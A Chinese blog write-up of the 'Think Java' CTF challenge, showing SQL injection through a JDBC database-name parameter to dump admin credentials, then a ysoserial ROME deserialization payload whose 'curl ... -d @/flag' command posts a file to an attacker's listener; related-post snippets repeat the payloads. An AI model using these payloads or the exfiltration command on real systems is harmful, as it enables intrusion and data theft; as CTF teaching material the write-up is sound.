【网鼎杯 2020 朱雀组】Think Java

已于 2022-04-08 16:21:58 修改
阅读量4.8k 收藏 5
点赞数 2
文章标签: web安全
于 2022-04-08 16:04:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sorryagain/article/details/124042393
版权

【网鼎杯 2020 朱雀组】Think Java

首先下载题目附件,是一些.class文件,反编译查看。
在这里插入图片描述

注意到引入的其中一个包:

import io.swagger.annotations.ApiOperation;

Swagger
Swagger 是一个规范和完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。总体目标是使客户端和文件系统作为服务器以同样的速度来更新。文件的方法,参数和模型紧密集成到服务器端的代码,允许API来始终保持同步。
Swagger UI 提供了一个可视化的UI页面展示描述文件。接口的调用方、测试、项目经理等都可以在该页面中对相关接口进行查阅和做一些简单的接口请求。该项目支持在线导入描述文件和本地部署UI项目。

访问/swagger-ui.html页面,得到如下三支接口
/common/user/current
/common/user/login
/common/test/sqlDict

在这里插入图片描述
查看sqlDict.class文件,该接口将用户传入的数据库名拼接到sql语句中执行查询。
如果用户没有指定数据库名,则使用默认,可以得知数据库名称为myapp

String sql = "Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = '" + dbName + "' and table_name='" + TableName + "';";
ResultSet rs = stmt.executeQuery(sql);

在这里插入图片描述

经过代码审计,这里存在sql注入。
对于Mysql数据库连接url参数设置,一般格式如下:

jdbc.url=jdbc:mysql://localhost:3306/database?useUnicode=true&characterEncoding=utf8&autoReconnect=true

在数据库名后,可以使用?附加参数,附加无效参数也不会影响连接,所以这里可以使用一个参数进行联合注入查询。
Payload:
myapp?a=1' union select 1#

myapp#' union select 1#

拼接后的连接url为:

jdbc:mysql://localhost:3306/myapp?a=1' union select 1#
jdbc:mysql://localhost:3306/myapp#' union select 1#

执行的查询语句为:

Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = 'myapp?a=1' union select 1#' and table_name='" + TableName + "';
Select TABLE_COMMENT from INFORMATION_SCHEMA.TABLES Where table_schema = 'myapp#' union select 1#' and table_name='" + TableName + "';

在swagger.html上执行payload,成功执行,可以看到联合查询的数据被附加在了tableDescribe参数后,且得知表名为user,表的字段名有idnamepwd
在这里插入图片描述
查询用户名Payload:
myapp#' union select name from user#

在这里插入图片描述

查询密码Payload:
myapp#' union select pwd from user#

在这里插入图片描述
得知用户名密码:

admin/admin@Rrrr_ctf_asde

使用登录接口登录,登录成功,得到一串data数据。

在这里插入图片描述

{
  "data": "Bearer rO0ABXNyABhjbi5hYmMuY29yZS5tb2RlbC5Vc2VyVm92RkMxewT0OgIAAkwAAmlkdAAQTGphdmEvbGFuZy9Mb25nO0wABG5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cHNyAA5qYXZhLmxhbmcuTG9uZzuL5JDMjyPfAgABSgAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAAAAAAAAXQABWFkbWlu",
  "msg": "登录成功",
  "status": 2,
  "timestamps": 1649404359032
}

看到data数据以rO0AB开头,基本可以确定是Java序列化后Base64编码的数据。

将data数据上送给获取当前用户接口,发现请求成功,并返回了当前用户的用户名,因此判断该接口中进行了Java对象的反序列化。

在这里插入图片描述

使用ysoserial生成Payload。

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar ROME "curl xx.xx.xx.xx:xxxx -d @/flag" | base64 -w 0

在这里插入图片描述
监听对应端口,并使用current接口发送生成的反序列化数据:
在这里插入图片描述

在这里插入图片描述
这里的Payload没有直接反弹shell,而是使用了这个命令:

curl xx.xx.xx.xx:xxxx -d @/flag

curl 命令使用 -d 参数可以发送 POST 请求

假设有一个登录页面 www.example.com/login,只需要提交用户名和密码便可登录。我们可以使用 CURL 来完成这一 POST 请求,-d 用于指定发送的数据,-X 用于指定发送数据的方式。如:

curl -d "userName=tom&passwd=123456" -X POST http://www.example.com/login

在使用 -d 的情况下,如果省略 -X,则默认为 POST 方式:

curl -d "userName=tom&passwd=123456" http://www.example.com/login

@符号表示从文件中读取数据,如:

在这里插入图片描述

在服务端监听对应端口,可以看到两次POST的数据:

在这里插入图片描述

2ha0yuk7on.
关注
【CTF】java反序列-2020-网鼎杯-朱雀-Web-think_java
(∪.∪ )...zzz的博客
06-13 3625
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
[网鼎杯 2020 朱雀]Think Java
Sk1y的博客
04-07 2224
[网鼎杯 2020 朱雀]Think Java 文章目录[网鼎杯 2020 朱雀]Think Java获取源文件SwaggerJDBC sql注入关于#的使用查看数据库名字获取表名获取字段名获取字段值对序列化字符串分析java Deserialization Scanner插件使用ysoserialcurl将flag带出来反弹shell参考文章 获取源文件 下载jar包,扔进jd-gui查看源码 主要是4个文件 Test.java 接收dbName参数,然后调用getTableData方法 packa
网鼎杯2020朱雀-web(Think Java)
weixin_43610673的博客
05-19 2530
下载class.zip解压后用jd-gui查看源码,我是用jd-gui弄出来然后sublime看的 在/common/test/sqlDict有个注入 主要是SqlDict.class 下面注入即可dbName=myapp?useUnicode=true’union/**/select/**/1 这里用post或者get提交都行 dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(informati
朱雀JAVA游戏_[网鼎杯2020朱雀]Think JAVA
weixin_36087895的博客
02-27 271
前言现在算是取得了很大的希望。但此题必有玄机。这就是朱雀31解的题,tqllllllllllll。下面是现在的功效,然则我照样没能拿到flag……菜,枯了。进入正题下方截图算是hint , 固然对于没有用过swagger-ui的 ,照样不算hint的叭(我都是问的大佬)。他是一个测试接口,我原本分享了swagger-ui的链接来着,然则现在谁人链接好像被接见炸了。(我在文章中已经把链接删了……考...
2020网鼎杯朱雀题目.rar
05-20
含有misc,re,crypto,pwn,webweb题为thinkjava
2022网鼎杯初赛朱雀赛题
10-18
2022网鼎杯初赛朱雀赛题
phpweb-[网鼎杯 2020 朱雀]-[BUUCTF]
qwsn
11-23 1994
0x01、Web 1.phpweb-[网鼎杯 2020 朱雀]-[传送门->BUUCTF] 第一步:点击传送门,打开题目环境 观察题目页面: //打开网页观察网页显示动态,发现网页每隔一段时间会刷新一下,说明可能自动间隔一段时间刷新一次,观察网页,网页上会显示一段warning信息,并提示了data()函数。 //利用BurpSuite拦截网页,看一下有什么异常。观察发现网页会传递两个参数,func和p。func对应的值为date,p对应的值为一串时间格式,说明网页可能向后端传递函数名及其对应的参数
[网鼎杯 2020 朱雀]phpweb 1
qq_43618536的博客
07-21 642
[网鼎杯 2020 朱雀]phpweb 1
Ctfhub-think_java-2020网鼎杯-朱雀
weixin_54227009的博客
12-27 667
唉,做ctfhub这道题的时候,发现网上几乎都是跟风用的这个命令来直接读取根目录下的flag,我看了buuctf上的这道题因为flag就在跟目录下,flag的名称并没有变化,故可以直接读到flag。但ctfhub上这道题,题目已经提示了flag在根目录下,且flag名字是随机的,故用该方法并不能直接读取到flag,所以只有反弹shell的命令来cat flag。
《thinkjava
04-08
《Think Java》作者:Allen B. Downey and Chris Mayeld。 Java学习资料,适合入门。是英文版的。
Think Java.zip
07-23
java编程思想pdf版本 这也是我自己一直看的一个版本很清晰 可以电脑 手机看 也可以在Kindle 看
CTF网鼎杯2020朱雀 thinkjava思路记录
最新发布
c0529的博客
05-23 1096
1.代码分析 BUUCTF在线评测 (buuoj.cn)打开ctf赛题之后,下载class文件,这个部分是不完整点的源码 在sqldict中存在一个sql注入点,没有采用java的预编译,调用了这个的是在test中,同时,这个采用了swagger接口,这是一个测试页面的接口,我们直接尝试打开这个页面 打开 网址/swagger-ui.html 2.测试点1 这里可以看见有三个可以测试的位置,参考源码中的文件地址,可以发现sql注入点存在在test这个测试中,我们dbName注入sql注
第二届网鼎杯(第三场:朱雀)Think Java
a3320315的博客
05-20 1737
首先题目给了一些class文件,这些不需要多说,直接jd-gui反编译或者使用fernflower反编译也可以 解题过程 先扫一下目录 得到swagger-ui.html 发现几个api接口 sql注入得到密码 源代码中明显存在SQL注入(dbName可控),但是必须满足两个条件,否则不能连接数据库 #号在引号里面时当做填充符,没有实际意义(这个只是在jdbc中这样?还没来得及验证) 最终: jdbc:mysql://mysqldbserver:3306/myapp#‘ union select
CTFHUB-think_java(2020-网鼎杯-朱雀-Web-think_java)
qq_51953382的博客
07-20 408
将编码后的内容填充到命令上,再通过ysoserial获得bin文件,拿到文件之后,我们还需要对其进行base64加密,这里使用的一个Python脚本。但是这是网鼎杯原题的payload,那个题目中flag名称就是flag,是不变的所以可以这么用,通过-d @来提取flag文件内容然后发到自己服务器。获得payload之后,先在咱们的服务器上监听端口之后,在另一个接口处输入payload,来进行反弹shell,注意开头的Bearer保留。进入之后,将我们的得到的信息输入登录实例,来进行调用。
Thinking in Java 8
morningbird的专栏
07-25 1346
第7章 多形性“对于面向对象的程序设计语言,多型性是第三种最基本的特征(前两种是数据抽象和继承。”“多形性”(Polymorphism)从另一个角度将接口从具体的实施细节中分离出来,亦即实现了“是什么”与“怎样做”两个模块的分离。利用多形性的概念,代码的织以及可读性均能获得改善。此外,还能创建“易于扩展”的程序。无论在项目的创建过程中,还是在需要加入新特性的时候,它们都可以方便地“成长”。通过合
Think Java 4 学习笔记
yufuer的专栏
06-02 96
ti记: 最近在看Think Java 4(中文),顺便把学习笔记记下来供以后参看。其中包含之前理解不到位的、含糊的、不清楚的简要说明。 第1章 对象导论 ··· ···     第2章 一切都是对象 2.1引用操作对象 一切都看做对象,但操作的标示符实际上是对象的一个引用。 2.2必须由你创建所有对象 5个储存的位置,基本类型特例(适配器模式); java中的数与...
[网鼎杯 2020 朱雀]nmap
03-16
nmap是一款网络扫描工具,可以用来扫描目标主机的开放端口、操作系统类型、服务版本等信息。它可以帮助安全人员评估网络安全状况,发现潜在的漏洞和攻击面。同时,nmap也可以用来管理网络,例如发现新设备、检查网络...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值